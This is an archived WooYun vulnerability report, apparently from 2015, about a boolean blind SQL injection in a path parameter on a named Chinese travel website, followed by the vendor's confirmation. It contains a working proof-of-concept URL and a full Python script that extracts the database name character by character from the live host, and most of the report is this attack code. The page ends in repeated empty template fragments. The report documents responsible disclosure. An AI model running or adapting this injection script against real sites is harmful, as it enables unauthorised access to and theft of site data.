同程旅游网旗下一起游网站SQL盲注 | wooyun-2015-089686

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-089686

漏洞标题：

同程旅游网旗下一起游网站SQL盲注

漏洞详情

披露状态：

2015-01-02：细节已通知厂商并且等待厂商处理中
2015-01-02：厂商已经确认，细节仅向厂商公开
2015-01-12：细节向核心白帽子及相关领域专家公开
2015-01-22：细节向普通白帽子公开
2015-02-01：细节向实习白帽子公开
2015-02-16：细节向公众公开

简要描述：

Boolean盲注，附验证脚本，仅供验证漏洞用。

详细说明：

1，注入点
http://www.17u.com/destination/city_lvyou_4602.html 4602为注入参数
2，PoC
http://www.17u.com/destination/city_lvyou_4602'%20and%20len(db_name())=7%20and%20'1'='1.html
3，Exp

4，验证脚本

#encoding=utf-8
import httplib
import time
import sys
import urllib
"""
This is the block of docstring.
"""
charset = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.[]')
headers = {
    'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
}
print '[%s] Start to retrive database: ' % time.strftime('%H:%M:%S', time.localtime())
db = ''
for i in range(1, 8):
    for char in charset:
        con = httplib.HTTPConnection('www.17u.com', 80, timeout=50)
        payload = "' and ascii(substring(db_name(),%s,1))=%s and '1'='1" % (i, ord(char))
        con.request(method='GET', url='/destination/city_lvyou_4602' + urllib.quote(payload) + '.html', headers=headers)
	    
        code = con.getresponse().status
        con.close()
        
        if code == 200:
		    db += char
		    sys.stdout.write('\n[Retriving database] ' + db)
		    sys.stdout.flush()
		    break
        else:
            pass
print '\n[%s Done] Database is %s' % (time.strftime('%H:%M:%S', time.localtime()), db)

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yns0ng@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-01-02 13:37

厂商回复：

感谢关注同程旅游，会尽快安排修复，假期报告，辛苦了。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yns0ng@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yns0ng@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞